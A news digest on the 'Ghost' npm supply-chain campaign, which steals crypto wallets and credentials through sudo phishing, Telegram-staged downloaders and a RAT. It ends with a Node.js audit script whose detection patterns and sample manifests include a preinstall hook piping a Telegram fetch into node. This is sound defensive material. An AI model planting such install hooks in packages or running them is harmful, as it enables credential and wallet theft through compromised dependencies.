Ghost Campaign Uses 7 Npm Packages to Steal Crypto Wallets and Credentials

The Hacker News, Mar 24, 2026

Why It Matters

The campaign exploits trusted development ecosystems to steal high‑value crypto assets and credentials, posing a direct financial threat to developers and enterprises. Its use of Telegram and Binance Smart Chain for monetization demonstrates a sophisticated, multi‑layered revenue model.

Key Takeaways

  • Seven npm packages masquerade as developer tools
  • Packages phish sudo passwords during fake install
  • Malware contacts Telegram for payload URL and decryption key
  • Final stage deploys RAT stealing wallets, credentials
  • Campaign uses GitHub, AI workflows to broaden reach

Pulse Analysis

The Ghost campaign illustrates how attackers are moving beyond traditional malware distribution channels, targeting the very tools developers rely on daily. By publishing seemingly innocuous npm packages and GitHub repositories, the threat actors embed credential‑stealing logic that activates only after a user unwittingly grants elevated privileges. This approach leverages the trust developers place in open‑source ecosystems, turning routine package installations into a covert infection vector that can compromise development pipelines and production environments alike.

A notable aspect of the operation is its multi‑stage architecture. Initial packages request sudo access under the guise of system optimization, then silently retrieve a downloader from a Telegram channel. The downloader decrypts a payload hosted via a Binance Smart Chain smart contract, enabling rapid updates without altering the core malware. This modular design not only streamlines the attackers’ ability to pivot tactics but also complicates detection, as each stage appears benign until the final remote‑access trojan is executed.

For organizations, the implications are clear: supply‑chain security must extend to every dependency, including seemingly low‑risk utilities. Implementing strict permission controls, monitoring npm install logs for anomalies, and employing runtime security tools can mitigate the risk of credential exfiltration. As AI‑assisted development workflows gain traction, security teams should also scrutinize automated code generation pipelines for hidden malicious scripts, ensuring that the convenience of modern tooling does not become an attack surface.
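As an added illustration of the install-time monitoring suggested above (this is not code from the article or from the campaign), a small Node.js audit that flags npm lifecycle scripts showing the two behaviours the article describes: prompting for sudo during install and contacting Telegram. The package names, scripts and indicator patterns below are constructed samples, not the seven real packages.

```javascript
// Heuristic audit of npm lifecycle scripts (added example, not the campaign's code).
// Feed it parsed package.json objects, e.g. one per directory under node_modules.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Indicators derived from the behaviours the article reports: a sudo prompt during
// install, Telegram contact for the next stage, and piping a download into an interpreter.
const INDICATORS = [
  { name: "sudo-prompt", re: /\bsudo\b/ },
  { name: "telegram-c2", re: /api\.telegram\.org|t\.me\//i },
  { name: "remote-fetch-exec", re: /\b(curl|wget)\b[^|]*\|\s*(sh|bash|node)\b/ },
];

// Returns one finding per (hook, indicator) hit in a single package manifest.
function auditManifest(pkg) {
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    for (const ind of INDICATORS) {
      if (ind.re.test(cmd)) {
        findings.push({ package: pkg.name, hook, indicator: ind.name, command: cmd });
      }
    }
  }
  return findings;
}

// Audits a list of manifests and returns all findings.
function auditAll(manifests) {
  return manifests.flatMap(auditManifest);
}

// Constructed sample manifests (hypothetical package names, not real ones).
const SAMPLE_MANIFESTS = [
  { name: "benign-lint-helper", version: "1.0.0",
    scripts: { test: "node test.js", postinstall: "node scripts/patch-config.js" } },
  { name: "fake-system-optimizer", version: "0.0.3",
    scripts: { postinstall: "sudo node optimize.js" } },
  { name: "fake-ci-tool", version: "2.1.0",
    scripts: { preinstall: "curl -s https://api.telegram.org/botEXAMPLE/getUpdates | node" } },
];

for (const f of auditAll(SAMPLE_MANIFESTS)) {
  console.log(`${f.package} [${f.hook}] ${f.indicator}: ${f.command}`);
}
```

Pattern matching of this kind catches only the obvious cases; obfuscated or string-assembled scripts will need a sandboxed install with network and process monitoring instead.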
